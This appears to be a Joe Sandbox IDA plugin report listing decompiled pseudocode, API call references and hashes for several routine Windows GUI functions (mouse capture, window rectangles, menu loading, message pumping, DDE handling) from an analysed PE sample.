                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0042BA36
                  • CoTaskMemFree.OLE32(?,000000FF), ref: 0042BAD3
                  • GetParent.USER32(?), ref: 0042BB3C
                  • SendMessageA.USER32(?,00000464,00000104,?), ref: 0042BB50
                  • GetParent.USER32(?), ref: 0042BB83
                  • SendMessageA.USER32(?,00000465,00000104,?), ref: 0042BB97
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageParentSend$FreeH_prolog3Task
                  • String ID:
                  • API String ID: 526180827-0
                  • Opcode ID: b8465ec876a2d8c5955011488c88846620c8314f3b98150dc5d40c38e7113ddd
                  • Instruction ID: 4b4f0189a4f3fee0b3fcf5c9af0e9106a490cf374a1a58ec6f3dfcf374972a15
                  • Opcode Fuzzy Hash: b8465ec876a2d8c5955011488c88846620c8314f3b98150dc5d40c38e7113ddd
                  • Instruction Fuzzy Hash: 48512F70A0021ADFCB04EFA1CC859AEB775FF44318B54452AB525A72E1DB38A941CB98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004258CF, Relevance: 9.1, APIs: 6, Instructions: 102windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 81%
                  			E004258CF(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct tagMSG _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t36;
				intOrPtr* _t37;
				void* _t41;
				intOrPtr _t53;
				void* _t54;
				void* _t56;
				void* _t57;
				intOrPtr* _t58;

				_t55 = __edx;
				_t51 = __ecx;
				_t56 = GetCapture;
				_t57 = __ecx;
				if(GetCapture() != 0) {
					L20:
					return 0;
				}
				E0040EE3C(0, _t51, SetCapture( *( *((intOrPtr*)(_t57 + 0x68)) + 0x20)));
				if(E0040EE3C(0, _t51, GetCapture()) !=  *((intOrPtr*)(_t57 + 0x68))) {
					L19:
					E0042573F(0, _t57, _t68);
					goto L20;
				} else {
					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
						_t30 = _v32.message - 0x100;
						if(_t30 == 0) {
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							if( *((intOrPtr*)(_t57 + 0x88)) != 0) {
								_t51 = _t57;
								E00425593(_t57, _v32.wParam, 1);
							}
							__eflags = _v32.wParam - 0x1b;
							if(__eflags != 0) {
								L18:
								_t32 = E0040EE3C(0, _t51, GetCapture());
								_t68 = _t32 -  *((intOrPtr*)(_t57 + 0x68));
								if(_t32 ==  *((intOrPtr*)(_t57 + 0x68))) {
									continue;
								}
							}
							goto L19;
						}
						_t34 = _t30 - 1;
						if(_t34 == 0) {
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							if(__eflags != 0) {
								_t51 = _t57;
								E00425593(_t57, _v32.wParam, 0);
							}
							goto L18;
						}
						_t36 = _t34 - 0xff;
						if(_t36 == 0) {
							_t53 = _v32.pt;
							_t55 = _v8;
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							_push(_t53);
							_push(_t53);
							_t37 = _t58;
							 *_t37 = _t53;
							 *((intOrPtr*)(_t37 + 4)) = _v8;
							_t51 = _t57;
							if( *((intOrPtr*)(_t57 + 0x88)) == 0) {
								E004255C9(_t51, _t56);
							} else {
								E0042551E(_t51);
							}
							goto L18;
						}
						_t41 = _t36;
						if(_t41 == 0) {
							_t54 = _t57;
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							if(__eflags == 0) {
								E00425888(0, _t54, __eflags);
							} else {
								E00425782(_t54, _t55, _t56, _t57, __eflags);
							}
							return 1;
						}
						if(_t41 == 0) {
							goto L19;
						}
						DispatchMessageA( &_v32);
						goto L18;
					}
					_push(_v32.wParam);
					E00414E3D();
					goto L19;
				}
			}



















                  0x004258cf
                  0x004258cf
                  0x004258da
                  0x004258e0
                  0x004258e6
                  0x004259c0
                  0x00000000
                  0x004259c0
                  0x004258f9
                  0x00425909
                  0x004259b9
                  0x004259bb
                  0x00000000
                  0x0042590f
                  0x00425911
                  0x00425929
                  0x0042592e
                  0x0042598e
                  0x00425994
                  0x0042599b
                  0x0042599d
                  0x0042599d
                  0x004259a2
                  0x004259a6
                  0x004259a8
                  0x004259ab
                  0x004259b0
                  0x004259b3
                  0x00000000
                  0x00000000
                  0x004259b3
                  0x00000000
                  0x004259a6
                  0x00425930
                  0x00425931
                  0x00425979
                  0x0042597f
                  0x00425985
                  0x00425987
                  0x00425987
                  0x00000000
                  0x0042597f
                  0x00425933
                  0x00425938
                  0x00425952
                  0x00425955
                  0x00425958
                  0x0042595e
                  0x0042595f
                  0x00425960
                  0x00425962
                  0x00425964
                  0x00425967
                  0x00425969
                  0x00425972
                  0x0042596b
                  0x0042596b
                  0x0042596b
                  0x00000000
                  0x00425969
                  0x0042593b
                  0x0042593c
                  0x004259d1
                  0x004259d3
                  0x004259d9
                  0x004259e2
                  0x004259db
                  0x004259db
                  0x004259db
                  0x00000000
                  0x004259e9
                  0x00425944
                  0x00000000
                  0x00000000
                  0x0042594a
                  0x00000000
                  0x0042594a
                  0x004259c7
                  0x004259ca
                  0x00000000
                  0x004259ca

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Capture$Message$Dispatch
                  • String ID:
                  • API String ID: 3654672037-0
                  • Opcode ID: d4753f6ef7ab843eaa07548e5f8b2e81fcb1612e08e19c19a32e1eae81b1b269
                  • Instruction ID: 46a2a674bff202cc99884ab51a775dfe1e4511bcd1986915b05b1171fc58927a
                  • Opcode Fuzzy Hash: d4753f6ef7ab843eaa07548e5f8b2e81fcb1612e08e19c19a32e1eae81b1b269
                  • Instruction Fuzzy Hash: D031D9B1710A25DFDF20ABB6E84597F76A8EF44365F90042BA041D2250CA3CDCC1C67E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004131F2, Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004131F2(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t78;
				void* _t79;
				void* _t80;

				_t80 = __eflags;
				E00431A9B(E0044BF26, __ebx, __edi, __esi);
				_t78 = __ecx;
				E00422EAE(__ebx, _t79 - 0x40, __edi, __ecx, _t80);
				 *(_t79 - 4) =  *(_t79 - 4) & 0x00000000;
				GetClientRect( *(_t78 + 0x20), _t79 - 0x2c);
				GetWindowRect( *(_t78 + 0x20), _t79 - 0x1c);
				E00422BFB(_t78, _t79 - 0x1c);
				OffsetRect(_t79 - 0x2c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
				E00422646(_t79 - 0x40, _t79 - 0x2c);
				OffsetRect(_t79 - 0x1c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
				 *((intOrPtr*)( *_t78 + 0x150))(_t79 - 0x40, _t79 - 0x1c, __ecx, 0x34);
				E0042268D(_t79 - 0x40, _t79 - 0x1c);
				SendMessageA( *(_t78 + 0x20), 0x14,  *(_t79 - 0x3c), 0);
				 *((intOrPtr*)( *_t78 + 0x158))(_t79 - 0x40, _t79 - 0x1c);
				 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
				return E00431B73(E00422F02(__ebx, _t79 - 0x40, OffsetRect, _t78,  *(_t79 - 4)));
			}






                  0x004131f2
                  0x00421612
                  0x00421617
                  0x0042161d
                  0x00421622
                  0x0042162d
                  0x0042163a
                  0x00421646
                  0x00421661
                  0x0042166a
                  0x0042167f
                  0x0042168d
                  0x0042169a
                  0x004216a9
                  0x004216bb
                  0x004216c1
                  0x004216d2

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00421612
                    • Part of subcall function 00422EAE: __EH_prolog3.LIBCMT ref: 00422EB5
                    • Part of subcall function 00422EAE: GetWindowDC.USER32(00000000,00000004,00419EC3,00000000,00000018,00418677,00000001,?,?,004527FC,004527FC), ref: 00422EE1
                  • GetClientRect.USER32 ref: 0042162D
                  • GetWindowRect.USER32 ref: 0042163A
                    • Part of subcall function 00422BFB: ScreenToClient.USER32 ref: 00422C0C
                    • Part of subcall function 00422BFB: ScreenToClient.USER32 ref: 00422C19
                  • OffsetRect.USER32(?,?,?), ref: 00421661
                    • Part of subcall function 00422646: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0042266F
                    • Part of subcall function 00422646: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 00422684
                  • OffsetRect.USER32(?,?,?), ref: 0042167F
                    • Part of subcall function 0042268D: IntersectClipRect.GDI32(?,?,?,?,?), ref: 004226B6
                    • Part of subcall function 0042268D: IntersectClipRect.GDI32(?,?,?,?,?), ref: 004226CB
                  • SendMessageA.USER32(?,00000014,?,00000000), ref: 004216A9
                    • Part of subcall function 00422F02: __EH_prolog3.LIBCMT ref: 00422F09
                    • Part of subcall function 00422F02: ReleaseDC.USER32 ref: 00422F26
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Clip$ClientH_prolog3$ExcludeIntersectOffsetScreenWindow$MessageReleaseSend
                  • String ID:
                  • API String ID: 2952362992-0
                  • Opcode ID: 4d7821c7f4b74c1374008cb86f107091761dbfdb9a1f2cd9f1ce72ed74d0e9cc
                  • Instruction ID: 54d9f2b2cb95faf2a6f24e4230d7989ba867047feb8828be0b4a30da0d48dd3d
                  • Opcode Fuzzy Hash: 4d7821c7f4b74c1374008cb86f107091761dbfdb9a1f2cd9f1ce72ed74d0e9cc
                  • Instruction Fuzzy Hash: 65210A7291001AEFDB15EBA4DC95DFEB7B8FF18305F40411AF152A71A0EB646A06CB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00429B26, Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 96%
                  			E00429B26(void* __ecx) {
				struct HINSTANCE__* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HACCEL__* _t31;
				struct HINSTANCE__* _t33;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t41;
				void* _t56;

				_push(__ecx);
				_t56 = __ecx;
				_t48 = __ecx + 0x64;
				_t31 =  *(__ecx + 0x64);
				if( *((intOrPtr*)(_t31 - 0xc)) == 0) {
					_t31 = E00402720(_t48,  *((intOrPtr*)(__ecx + 0x40)));
				}
				_t53 = LoadMenuA;
				_t45 = LoadAcceleratorsA;
				if( *(_t56 + 0x48) != 0) {
					_t60 =  *((intOrPtr*)(_t56 + 0x30));
					if( *((intOrPtr*)(_t56 + 0x30)) == 0) {
						_t41 =  *(E0041F363(LoadAcceleratorsA, LoadMenuA, _t56, _t60) + 0xc);
						_v8 = _t41;
						 *((intOrPtr*)(_t56 + 0x30)) = LoadMenuA(_t41,  *(_t56 + 0x48) & 0x0000ffff);
						_t31 = LoadAcceleratorsA(_v8,  *(_t56 + 0x48) & 0x0000ffff);
						 *(_t56 + 0x34) = _t31;
					}
				}
				if( *(_t56 + 0x44) != 0) {
					_t62 =  *((intOrPtr*)(_t56 + 0x38));
					if( *((intOrPtr*)(_t56 + 0x38)) == 0) {
						_t37 =  *(E0041F363(_t45, _t53, _t56, _t62) + 0xc);
						_v8 = _t37;
						 *((intOrPtr*)(_t56 + 0x38)) = LoadMenuA(_t37,  *(_t56 + 0x44) & 0x0000ffff);
						_t31 = LoadAcceleratorsA(_v8,  *(_t56 + 0x44) & 0x0000ffff);
						 *(_t56 + 0x3c) = _t31;
					}
				}
				if( *(_t56 + 0x4c) != 0) {
					_t64 =  *((intOrPtr*)(_t56 + 0x28));
					if( *((intOrPtr*)(_t56 + 0x28)) == 0) {
						_t33 =  *(E0041F363(_t45, _t53, _t56, _t64) + 0xc);
						_v8 = _t33;
						 *((intOrPtr*)(_t56 + 0x28)) = LoadMenuA(_t33,  *(_t56 + 0x4c) & 0x0000ffff);
						_t31 = LoadAcceleratorsA(_v8,  *(_t56 + 0x4c) & 0x0000ffff);
						 *(_t56 + 0x2c) = _t31;
					}
				}
				return _t31;
			}













                  0x00429b2b
                  0x00429b2e
                  0x00429b30
                  0x00429b33
                  0x00429b3a
                  0x00429b3f
                  0x00429b3f
                  0x00429b48
                  0x00429b4e
                  0x00429b54
                  0x00429b56
                  0x00429b5a
                  0x00429b65
                  0x00429b6a
                  0x00429b6f
                  0x00429b7a
                  0x00429b7c
                  0x00429b7c
                  0x00429b5a
                  0x00429b83
                  0x00429b85
                  0x00429b89
                  0x00429b94
                  0x00429b99
                  0x00429b9e
                  0x00429ba9
                  0x00429bab
                  0x00429bab
                  0x00429b89
                  0x00429bb2
                  0x00429bb4
                  0x00429bb8
                  0x00429bc3
                  0x00429bc8
                  0x00429bcd
                  0x00429bd8
                  0x00429bda
                  0x00429bda
                  0x00429bb8
                  0x00429be1

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Load$AcceleratorsMenu
                  • String ID:
                  • API String ID: 144087665-0
                  • Opcode ID: 63325f3d1794a7671403ffaf6cbc211b7d823684c930ae83eaf93ae77def3f67
                  • Instruction ID: da6f9872910fb6daf6ffe8524f97512d90dd08739e674e0cfadb783181bbf01d
                  • Opcode Fuzzy Hash: 63325f3d1794a7671403ffaf6cbc211b7d823684c930ae83eaf93ae77def3f67
                  • Instruction Fuzzy Hash: 13215E71500724EFC720DB66D984B6AF7F4FF08714F50482EE58282A60D379BC80DB24
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00416EE5, Relevance: 9.1, APIs: 6, Instructions: 69COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00416EE5(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t8;
				void* _t14;
				struct HWND__** _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t18, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t17 = _t18;
						_t8 = _t18;
						if(_t18 == 0) {
							L10:
							if(_a4 == 0 && _t18 != 0) {
								_t18 = GetLastActivePopup(_t18);
							}
							_t16 = _a8;
							if(_t16 != 0) {
								if(_t17 == 0 || IsWindowEnabled(_t17) == 0 || _t17 == _t18) {
									 *_t16 =  *_t16 & 0x00000000;
								} else {
									 *_t16 = _t17;
									EnableWindow(_t17, 0);
								}
							}
							return _t18;
						} else {
							goto L9;
						}
						do {
							L9:
							_t17 = _t8;
							_t8 = GetParent(_t8);
						} while (_t8 != 0);
						goto L10;
					}
					_t18 = GetParent(_t18);
					L7:
					if(_t18 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t14 = E00416EA0();
				if(_t14 != 0) {
					L4:
					_t18 =  *(_t14 + 0x20);
					goto L7;
				}
				_t14 = E00403AA0();
				if(_t14 != 0) {
					goto L4;
				}
				_t18 = 0;
				goto L8;
			}








                  0x00416ef2
                  0x00416ef8
                  0x00416f15
                  0x00416f23
                  0x00416f2e
                  0x00416f2e
                  0x00416f30
                  0x00416f34
                  0x00416f3f
                  0x00416f43
                  0x00416f50
                  0x00416f50
                  0x00416f52
                  0x00416f57
                  0x00416f5b
                  0x00416f79
                  0x00416f6c
                  0x00416f6f
                  0x00416f71
                  0x00416f71
                  0x00416f5b
                  0x00416f82
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00416f36
                  0x00416f36
                  0x00416f37
                  0x00416f39
                  0x00416f3b
                  0x00000000
                  0x00416f36
                  0x00416f28
                  0x00416f2a
                  0x00416f2c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00416f2c
                  0x00416efa
                  0x00416f01
                  0x00416f10
                  0x00416f10
                  0x00000000
                  0x00416f10
                  0x00416f03
                  0x00416f0a
                  0x00000000
                  0x00000000
                  0x00416f0c
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                  • String ID:
                  • API String ID: 670545878-0
                  • Opcode ID: 13871ef3759c618d8f268107ebfde00254af1969d96d9b07d1e74764d8d3a6e7
                  • Instruction ID: 9e4f7b4cd4cbdf7f40bd5940dfb5179cf4edfd5842048a0ac895ae762c2329d2
                  • Opcode Fuzzy Hash: 13871ef3759c618d8f268107ebfde00254af1969d96d9b07d1e74764d8d3a6e7
                  • Instruction Fuzzy Hash: BC1194366052316BDB311B6AAD447AB66A86F55B60F17012BED04A7344DB38CC838ADD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040819E, Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                  Download Yara Rule
                  C-Code - Quality: 92%
                  			E0040819E(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void* __edi;
				void* __esi;
				struct HWND__* _t17;
				signed int _t22;
				struct HWND__* _t32;
				void* _t34;

				_t30 = __ecx;
				_push(__ecx);
				_v8 = __ecx;
				_t17 = GetWindow(GetDesktopWindow(), 5);
				_t32 = _t17;
				_t36 = _t32;
				if(_t32 == 0) {
					L14:
					return _t17;
				} else {
					_push(_t34);
					do {
						_t34 = E0040EE68(_t30, _t32, _t34, _t36, _t32);
						if(_t34 != 0) {
							_t20 =  *((intOrPtr*)(_v8 + 0x20));
							if( *((intOrPtr*)(_v8 + 0x20)) != _t32 && E00408105(_t20, _t32) != 0) {
								_t22 = GetWindowLongA(_t32, 0xfffffff0);
								if(_a4 != 0) {
									__eflags = _t22 & 0x18000000;
									if(__eflags == 0) {
										__eflags =  *(_t34 + 0x3c) & 0x00000002;
										if(__eflags != 0) {
											__eflags =  *(_v8 + 0xb4);
											if(__eflags == 0) {
												ShowWindow(_t32, 4);
												_t14 = _t34 + 0x3c;
												 *_t14 =  *(_t34 + 0x3c) & 0xfffffffd;
												__eflags =  *_t14;
											}
										}
									}
								} else {
									if((_t22 & 0x18000000) == 0x10000000) {
										ShowWindow(_t32, 0);
										 *(_t34 + 0x3c) =  *(_t34 + 0x3c) | 0x00000002;
									}
								}
							}
						}
						_t17 = GetWindow(_t32, 2);
						_t32 = _t17;
					} while (_t32 != 0);
					goto L14;
				}
			}










                  0x0040819e
                  0x004081a3
                  0x004081a7
                  0x004081b1
                  0x004081b7
                  0x004081b9
                  0x004081bb
                  0x00408243
                  0x00408245
                  0x004081c1
                  0x004081c8
                  0x004081c9
                  0x004081cf
                  0x004081d3
                  0x004081d8
                  0x004081dd
                  0x004081ed
                  0x004081f7
                  0x00408210
                  0x00408215
                  0x00408217
                  0x0040821b
                  0x00408220
                  0x00408227
                  0x0040822c
                  0x0040822e
                  0x0040822e
                  0x0040822e
                  0x0040822e
                  0x00408227
                  0x0040821b
                  0x004081f9
                  0x00408203
                  0x00408208
                  0x0040820a
                  0x0040820a
                  0x00408203
                  0x004081f7
                  0x004081dd
                  0x00408235
                  0x0040823b
                  0x0040823d
                  0x00000000
                  0x004081c9

                  APIs
                  • GetDesktopWindow.USER32 ref: 004081AA
                  • GetWindow.USER32(00000000), ref: 004081B1
                  • GetWindowLongA.USER32 ref: 004081ED
                  • ShowWindow.USER32(00000000,00000000), ref: 00408208
                  • ShowWindow.USER32(00000000,00000004), ref: 0040822C
                  • GetWindow.USER32(00000000,00000002), ref: 00408235
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Show$DesktopLong
                  • String ID:
                  • API String ID: 3178490500-0
                  • Opcode ID: 2adaebdcccac595bc1267bf586bd64cc53134c589bb79a51c25d8a8f8971210c
                  • Instruction ID: 421dcce19a151290b000e9d638100705882381d2d218f3d77e8fe81ceb2f36eb
                  • Opcode Fuzzy Hash: 2adaebdcccac595bc1267bf586bd64cc53134c589bb79a51c25d8a8f8971210c
                  • Instruction Fuzzy Hash: 0B110431440A04AFD721C7258E89F2F36B5EB917A5FA105BEF881B62C4CF3CDC018A19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004252FF, Relevance: 9.1, APIs: 6, Instructions: 65windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 72%
                  			E004252FF(void* __ecx) {
				struct tagMSG _v32;
				void* __ebx;
				int _t20;
				intOrPtr _t23;
				int _t30;
				intOrPtr _t31;
				void* _t32;
				void* _t33;
				void* _t36;
				void* _t38;

				_t32 = PeekMessageA;
				_t38 = __ecx;
				while(PeekMessageA( &_v32, 0, 0xf, 0xf, 0) != 0) {
					_t20 = GetMessageA( &_v32, 0, 0xf, 0xf);
					if(_t20 != 0) {
						DispatchMessageA( &_v32);
						continue;
					}
					return _t20;
				}
				_t23 =  *((intOrPtr*)(_t38 + 0x68));
				 *((intOrPtr*)(_t38 + 0x70)) =  *((intOrPtr*)(_t23 + 0x88));
				 *(_t38 + 0x78) =  *(_t23 + 0x84) & 0x0000f000;
				SetRectEmpty(_t38 + 0xc);
				 *((intOrPtr*)(_t38 + 0x20)) = 0;
				 *((intOrPtr*)(_t38 + 0x1c)) = 0;
				 *((intOrPtr*)(_t38 + 0x24)) = 0;
				 *((intOrPtr*)(_t38 + 0x7c)) = 0;
				 *((intOrPtr*)(_t38 + 0x80)) = 0;
				_t33 = E0040EE3C(_t32,  *((intOrPtr*)(_t23 + 0x88)), GetDesktopWindow());
				_t30 = LockWindowUpdate( *(_t33 + 0x20));
				_t36 = _t33;
				if(_t30 == 0) {
					_push(3);
				} else {
					_push(0x403);
				}
				_push(0);
				_t31 = E00425132(_t36);
				 *((intOrPtr*)(_t38 + 0x84)) = _t31;
				return _t31;
			}













                  0x00425308
                  0x00425310
                  0x00425337
                  0x0042531f
                  0x00425327
                  0x00425331
                  0x00000000
                  0x00425331
                  0x004253b3
                  0x004253b3
                  0x00425347
                  0x00425350
                  0x0042535e
                  0x00425365
                  0x0042536b
                  0x0042536e
                  0x00425371
                  0x00425374
                  0x00425377
                  0x00425389
                  0x0042538e
                  0x00425394
                  0x00425398
                  0x004253a1
                  0x0042539a
                  0x0042539a
                  0x0042539a
                  0x004253a3
                  0x004253a4
                  0x004253a9
                  0x00000000

                  APIs
                  • GetMessageA.USER32 ref: 0042531F
                  • DispatchMessageA.USER32 ref: 00425331
                  • PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 00425341
                  • SetRectEmpty.USER32(?), ref: 00425365
                  • GetDesktopWindow.USER32 ref: 0042537D
                  • LockWindowUpdate.USER32(?,00000000), ref: 0042538E
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                  • String ID:
                  • API String ID: 1192691108-0
                  • Opcode ID: aace2d7f96b7781ae3f89cd1ea8af059833168b570cc0a46978888ca4ec1f2a3
                  • Instruction ID: 49a96046c5d33274eb4831c9af67dae449dda2e98a187f2c04bc5722c74187fb
                  • Opcode Fuzzy Hash: aace2d7f96b7781ae3f89cd1ea8af059833168b570cc0a46978888ca4ec1f2a3
                  • Instruction Fuzzy Hash: CB117F76A00B01ABD720DFA6DC48B67BBFCBB44740F40443AE696D76A1EB74D4019B18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040B025, Relevance: 9.1, APIs: 6, Instructions: 59windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 63%
                  			E0040B025(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t28;
				long _t31;
				void* _t33;
				void* _t38;
				void* _t58;
				void* _t59;

				_t52 = __edx;
				_push(0x18);
				E00431ACE(E0044AEBE, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t59 - 0x1c)) = __ecx;
				_push(_t59 - 0x18);
				_push(_t59 - 0x20);
				_push( *((intOrPtr*)(_t59 + 0xc)));
				_push(0x3e8);
				L00447488();
				_t28 = GlobalLock( *(_t59 - 0x18));
				E004014C0(_t59 - 0x14, _t52);
				 *(_t59 - 4) =  *(_t59 - 4) & 0x00000000;
				 *(_t59 - 4) = 1;
				E00402830(_t52, __edi, _t28);
				_t31 = GlobalUnlock( *(_t59 - 0x18));
				 *(_t59 - 4) =  *(_t59 - 4) & 0x00000000;
				_push( *(_t59 - 0x18));
				_push(0x8000);
				_push(0x3e4);
				_push(0x3e8);
				_push( *((intOrPtr*)(_t59 + 0xc)));
				L00447482();
				_t54 =  *((intOrPtr*)(_t59 - 0x1c));
				PostMessageA( *(_t59 + 8), 0x3e4,  *( *((intOrPtr*)(_t59 - 0x1c)) + 0x20), _t31);
				_t33 = E00412C5B( *((intOrPtr*)(_t59 - 0x1c)));
				_t61 = _t33;
				if(_t33 != 0) {
					_t58 = E0040A688(_t59 - 0x14);
					_t38 = E0041F363(__ebx, _t54, _t58, _t61);
					_t52 =  *((intOrPtr*)( *((intOrPtr*)(_t38 + 4))));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t38 + 4)))) + 0xa0))(_t58);
					E0040A356(_t59 - 0x14, 0xffffffff);
				}
				E004010B0( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
				return E00431B73(0);
			}









                  0x0040b025
                  0x0040b025
                  0x0040b02c
                  0x0040b031
                  0x0040b037
                  0x0040b03b
                  0x0040b03c
                  0x0040b03f
                  0x0040b044
                  0x0040b04c
                  0x0040b057
                  0x0040b05c
                  0x0040b064
                  0x0040b068
                  0x0040b070
                  0x0040b076
                  0x0040b07a
                  0x0040b082
                  0x0040b087
                  0x0040b088
                  0x0040b08d
                  0x0040b090
                  0x0040b095
                  0x0040b0a0
                  0x0040b0a8
                  0x0040b0ad
                  0x0040b0af
                  0x0040b0b9
                  0x0040b0bb
                  0x0040b0c3
                  0x0040b0c8
                  0x0040b0d3
                  0x0040b0d3
                  0x0040b0de
                  0x0040b0ea

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 0040B02C
                  • UnpackDDElParam.USER32(000003E8,?,?,?), ref: 0040B044
                  • GlobalLock.KERNEL32 ref: 0040B04C
                  • GlobalUnlock.KERNEL32(?,00000000), ref: 0040B070
